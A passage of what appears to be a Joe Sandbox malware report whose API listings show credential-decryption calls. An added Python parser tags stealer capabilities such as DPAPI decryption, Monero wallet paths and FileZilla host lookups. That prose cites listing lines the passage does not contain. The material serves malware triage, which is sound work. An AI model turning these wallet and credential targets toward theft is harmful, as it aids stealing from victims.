                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: e7e9dedf1d74335e470326ac317dbe2daef3330adc0e84037a5555b1245dd5ea
                        • Instruction ID: 2b2f13bfa180fba1774d6cabf45a1df3e81b99df9edff15e1a24cb1c61e878ac
                        • Opcode Fuzzy Hash: e7e9dedf1d74335e470326ac317dbe2daef3330adc0e84037a5555b1245dd5ea
                        • Instruction Fuzzy Hash: 37010C75A00208EBCB24DFA5CD48BEDBBF8FF48700F108598AA05E6240DB349B45CF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !z/$Xh3.$Xv&$a&~o
                        • API String ID: 0-3215016525
                        • Opcode ID: 0665eac30637b88fd087c6a6bff9d142405be371555b7fd777c47ade1b5834e8
                        • Instruction ID: 7eefdc656ef30e1f8f1aa571929ff8f18f85cc25217d4f41a38b65dba4e63db6
                        • Opcode Fuzzy Hash: 0665eac30637b88fd087c6a6bff9d142405be371555b7fd777c47ade1b5834e8
                        • Instruction Fuzzy Hash: 94B207F360C214AFE3086E2DEC8567BBBE9EFD4620F1A453DEAC5C3744E93558018696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Pou{$_]?{$r2V~$sf^
                        • API String ID: 0-1122797718
                        • Opcode ID: 4457543fcb15f51efa968b99565c830ca7fb74e639c19a2030cc89ea02689e08
                        • Instruction ID: 2f999f2c3a018cde69e20ba7d8ed40fbfa18dee6ff03a18ec1203a312a710ca3
                        • Opcode Fuzzy Hash: 4457543fcb15f51efa968b99565c830ca7fb74e639c19a2030cc89ea02689e08
                        • Instruction Fuzzy Hash: FBB215F360C2009FE704AE29EC8567AF7E5EF94720F16893DEAC583744EA3598058797
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,005E5184,40000001,00000000,00000000,?,005E5184), ref: 005F8EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 29d3f3109aea7ecff463767d74a1848fd1810aec21599a4b935023b64aa18649
                        • Instruction ID: d5000802efed863517aaf147620055d57078ff66fde946cb392da8378c00adcf
                        • Opcode Fuzzy Hash: 29d3f3109aea7ecff463767d74a1848fd1810aec21599a4b935023b64aa18649
                        • Instruction Fuzzy Hash: 20111870200209BFDB04CF64D885FBB3BAABF89700F109858FA198B250DB79EC41DB60
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0115E5F0,00000000,?,00600E10,00000000,?,00000000,00000000), ref: 005F7A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F7A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0115E5F0,00000000,?,00600E10,00000000,?,00000000,00000000,?), ref: 005F7A7D
                        • wsprintfA.USER32 ref: 005F7AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: bc586ce0ba3250c570229b588767e81cf224c481446d4028d956b16d68295f37
                        • Instruction ID: 86df9c1a8a9fa5346c73ef7023fa9b933fb2ecf4022156a54d7ba4929e381f3f
                        • Opcode Fuzzy Hash: bc586ce0ba3250c570229b588767e81cf224c481446d4028d956b16d68295f37
                        • Instruction Fuzzy Hash: B31182B1945218DBEB248F54DC45F6ABB78FB04711F1047A6EA06932C0D7745A41CF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: +Pog$CA}$j$y_
                        • API String ID: 0-3843731330
                        • Opcode ID: 52c27b433a39a28c22c53164a1f022b90f101707ecb428ad4475fcc2c39024ca
                        • Instruction ID: 22c7c71d52766b30a18570ac299818acefb41d138bbc36f8ab06a69801cdd322
                        • Opcode Fuzzy Hash: 52c27b433a39a28c22c53164a1f022b90f101707ecb428ad4475fcc2c39024ca
                        • Instruction Fuzzy Hash: A7B203F360C600AFE704AE29EC8567AFBE5EF94720F16893DE6C587344E6355801C697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: n".$$0~O$:Md
                        • API String ID: 0-636006483
                        • Opcode ID: 8c774b0dc247c9b58a9b429ef0221eae22ee82e7b96866dc9e625912640f45c6
                        • Instruction ID: da83bdbf96797a2502f7e3ea5def32994b665efbbc63288c139ede2abe236d34
                        • Opcode Fuzzy Hash: 8c774b0dc247c9b58a9b429ef0221eae22ee82e7b96866dc9e625912640f45c6
                        • Instruction Fuzzy Hash: 345206F360C2009FE3046E29EC8567AFBE9EF94320F1A493EE6C4C7744E67598458697
                        APIs
                        • CoCreateInstance.COMBASE(005FE118,00000000,00000001,005FE108,00000000), ref: 005F3758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005F37B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: e961dd5ff9247f25589f3a670fdfa8b6a7249fb454d390878b8cb5d689ee7660
                        • Instruction ID: 94ed2da8e289fa37d7e8e3be6464966d7458d2536dda03bc735155162d531707
                        • Opcode Fuzzy Hash: e961dd5ff9247f25589f3a670fdfa8b6a7249fb454d390878b8cb5d689ee7660
                        • Instruction Fuzzy Hash: 7841E971A40A1C9FDB24DB58CC95FABB7B5BB48702F4081D8E608A7290E7756E85CF50
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005E9B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 005E9BA3
                        • LocalFree.KERNEL32(?), ref: 005E9BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: d49f4b44cbda0b5295c8ac6011d5bbaeda073382041719b9ef7be189dbe155c2
                        • Instruction ID: b68873e8dac53b14947c574fd8f3e5284496a16eacb6d37711c40779114bdabf
                        • Opcode Fuzzy Hash: d49f4b44cbda0b5295c8ac6011d5bbaeda073382041719b9ef7be189dbe155c2
                        • Instruction Fuzzy Hash: 9F11CCB8A00209DFDB04DF94D985AAE77F9FF88300F104559E915A7350D774AE51CFA1
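The API listings in this section are what an analyst actually triages: the CryptUnprotectData / LocalAlloc / LocalFree routine at 005E9B84 above, and the subcall chain further down the page (SHGetFolderPathA with CSIDL 0x1C, lstrlen on \Monero\wallet.keys, StrStrA on <Host>) under the function at 005F0362. The following is an added example and not part of the Joe Sandbox report or of the Stealc sample: a small Python parser for this record format that groups each "APIs" block into one record and tags the capability the calls imply. The sample text is constructed from the lines on this page, the tag names are this example's own, and the reading of <Host> as the element name used in FileZilla's stored-server XML is an assumption made here, not something the report states.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed excerpt of the Joe Sandbox function listing on this page (the API
# lines of two records); a real report contains hundreds of such records.
SAMPLE = r"""
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005E9B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 005E9BA3
• LocalFree.KERNEL32(?), ref: 005E9BD3
Memory Dump Source
• Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
APIs
  • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
  • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
• GetProcessHeap.KERNEL32(00000000,000F423F,00600DBA,00600DB7,00600DB6,00600DB3), ref: 005F0362
• RtlAllocateHeap.NTDLL(00000000), ref: 005F0369
• StrStrA.SHLWAPI(00000000,<Host>), ref: 005F0385
Memory Dump Source
"""

# One "• API.MODULE(args), ref: ADDR" line, optionally prefixed with the
# "Part of subcall function XXXXXXXX:" marker Joe Sandbox uses for callees.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

CSIDL_LOCAL_APPDATA = 0x1C  # second argument of SHGetFolderPathA


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                       # call-site address in the dump
    subcall: Optional[str] = None  # callee in which the call occurs, if indirect


def parse_api_records(text: str) -> List[List[ApiCall]]:
    """Group the API lines of a function listing into one record per 'APIs' block."""
    records: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
        elif stripped == "Memory Dump Source":
            current = None
        elif current is not None:
            m = API_LINE.match(line)
            if m:
                current.append(ApiCall(m["api"], m["mod"], m["args"].split(","),
                                       m["ref"], m["sub"]))
    return records


def api_names(record: List[ApiCall]) -> List[str]:
    return [c.api for c in record]


def triage(record: List[ApiCall]) -> set:
    """Tag the capability a record implies. Tag names are this example's own."""
    tags = set()
    for call in record:
        if call.api == "CryptUnprotectData":
            tags.add("dpapi-decrypt")  # DPAPI blob decryption under the user's key
        if call.api.startswith("SHGetFolderPath") and len(call.args) > 1:
            try:
                if int(call.args[1], 16) == CSIDL_LOCAL_APPDATA:
                    tags.add("local-appdata-lookup")
            except ValueError:
                pass  # argument was unresolved ("?") in the dump
        for arg in call.args:
            if "wallet" in arg.lower():
                tags.add("wallet-path:" + arg)
            if arg == "<Host>":
                # assumption: the element FileZilla's server XML uses for hostnames
                tags.add("xml-host-tag")
    return tags


if __name__ == "__main__":
    for i, rec in enumerate(parse_api_records(SAMPLE)):
        print(i, api_names(rec), sorted(triage(rec)))
```

Feeding the full function listing of a report through parse_api_records gives one record per function; the tags are only a first pass, and each hit should be confirmed against the call arguments and the surrounding strings before it is written up as a capability.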
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 1X[$w)yX
                        • API String ID: 0-2339031070
                        • Opcode ID: cde7363d10140f75c43665f333db6e8b1a4ec92561dbec3dd397078419b20e4e
                        • Instruction ID: 6ca7697fe89d706a846ec0cbea58045d7f424bb28f771ae19dfbf41f3ac34eaf
                        • Opcode Fuzzy Hash: cde7363d10140f75c43665f333db6e8b1a4ec92561dbec3dd397078419b20e4e
                        • Instruction Fuzzy Hash: 74B206F360C204AFD3046E2DEC8567ABBE9EF98720F1A453DEAC4C7740E67598058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #Vgk$Z_~
                        • API String ID: 0-4280087612
                        • Opcode ID: 38f5cc7753960fae98d210fc443f0c4f517b56f237d388f4402bba249781d7f4
                        • Instruction ID: 83811266dcbf675a65521714fc7aba2e279b4f8add74fba89f6421c93807a5b6
                        • Opcode Fuzzy Hash: 38f5cc7753960fae98d210fc443f0c4f517b56f237d388f4402bba249781d7f4
                        • Instruction Fuzzy Hash: 4B7209F3A0C2009FE704AE2DEC4567ABBE9EF94720F1A853DE5C5C7744EA3598018697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: (!}|$VVnF
                        • API String ID: 0-3446932408
                        • Opcode ID: 4b3fc2bb469a8e16a5a5a3234b92e9db46f66a625be91b9c5739f63f308ecede
                        • Instruction ID: e4809a70a0a707191a0758e52c0a86307a407f3e63b2f45903931fc5cdf02923
                        • Opcode Fuzzy Hash: 4b3fc2bb469a8e16a5a5a3234b92e9db46f66a625be91b9c5739f63f308ecede
